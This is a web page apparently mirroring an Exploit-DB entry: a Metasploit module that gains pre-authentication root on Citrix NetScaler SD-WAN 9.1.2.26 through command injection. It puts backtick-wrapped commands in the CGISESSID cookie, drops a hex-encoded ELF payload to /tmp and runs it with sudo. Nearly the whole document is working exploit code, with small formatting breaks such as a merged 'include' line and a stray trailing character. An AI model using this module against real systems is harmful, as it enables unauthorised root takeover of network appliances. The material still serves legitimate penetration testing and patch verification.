Netscaler SD-WAN 9.1.2.26.561201 – Command Injection (Metasploit)

  • 作者: xort
    日期: 2017-07-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/42345/
  • # Exploit Title: Citix SD-WAN logout cookie preauth Remote Command Injection Vulnerablity 
# Date: 02/20/2017
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.citrix.com
# Software Link: https://www.citrix.com/downloads/cloudbridge/
# Version: 9.1.2.26.561201
# Tested on: 9.1.2.26.561201 (OS partition 4.6)
#
# CVE : (awaiting cve)

# vuln: CGISESSID Cookie parameter
#associated vuln urls:
# /global_data/ 
#			/global_data/headerdata 
#			/log
#			/
#			/r9-1-2-26-561201/configuration/ 
#			/r9-1-2-26-561201/configuration/edit 
#			/r9-1-2-26-561201/configuration/www.citrix.com [CGISESSID cookie]
#
# Description PreAuth Remote Root Citrix SD-WAN <= v9.1.2.26.561201. This exploit leverages a command injection bug. 
#
# xort @ Critical Start

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = ExcellentRanking
	includeExploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name' => 'Citrix SD-WAN CGISESSID Cookie Remote Root',
					'Description'=> %q{
					This module exploits a remote command execution vulnerability in the Citrix SD-WAN Appliace Version <=v9.1.2.26.561201. The vulnerability exist in a section of the machine's session checking functionality. If the CGISESSID cookie holds shell-command data - it is used in a call to system where input is processed unsanitized.
			},
			'Author' =>
				[
					'xort@Critical Start', # vuln + metasploit module
				],
			'Version'=> '$Revision: 1 $',
			'References' =>
				[
					[ 'none', 'none'],
				],
			'Platform'=> [ 'linux'],
			'Privileged' => true,
			 'Arch'=> [ ARCH_X86 ],
'SessionTypes'=> [ 'shell' ],
		'Payload'=>
{ 
'Compat' =>
{
'ConnectionType' => 'find',
}
},

			'Targets'=>
				[
					['Linux Universal',
						{
								'Arch' => ARCH_X86,
								'Platform' => 'linux'
						}
					],
				],
			'DefaultTarget' => 0))

			register_options(
				[
					OptString.new('CMD', [ false, 'Command to execute', "" ]),	
					Opt::RPORT(443),
				], self.class)
	end

	def run_command(cmd)

		vprint_status( "Running Command...\n" )

		# send request with payload	
		res = send_request_cgi({
			'method' => 'POST',
'uri' => "/global_data/",
			'vars_post' => {
				'action' => 'logout'
			},
 	'headers' => {
	'Connection' => 'close',
	'Cookie' => 'CGISESSID=e6f1106605b5e8bee6114a3b5a88c5b4`'+cmd+'`; APNConfigEditorSession=0qnfarge1v62simtqeb300lkc7;',
}

		})


		# pause to let things run smoothly
		sleep(2)


	end

	
	def exploit
		# timeout
		timeout = 1550;

		# pause to let things run smoothly
		sleep(2)

		 #if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?

cmd = datastore['CMD']

# Encode cmd payload

encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2')

			# upload elf to /tmp/n , chmod +rx /tmp/n , then run /tmp/n (payload)
run_command("echo -e #{encoded_cmd}>/tmp/n")
run_command("chmod 755 /tmp/n")
run_command("sudo /tmp/n")
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2')

			# upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
run_command("echo -e #{encoded_elf}>/tmp/m")
run_command("chmod 755 /tmp/m")
run_command("sudo /tmp/m")

			# wait for magic
handler
			
end


	end
end
    C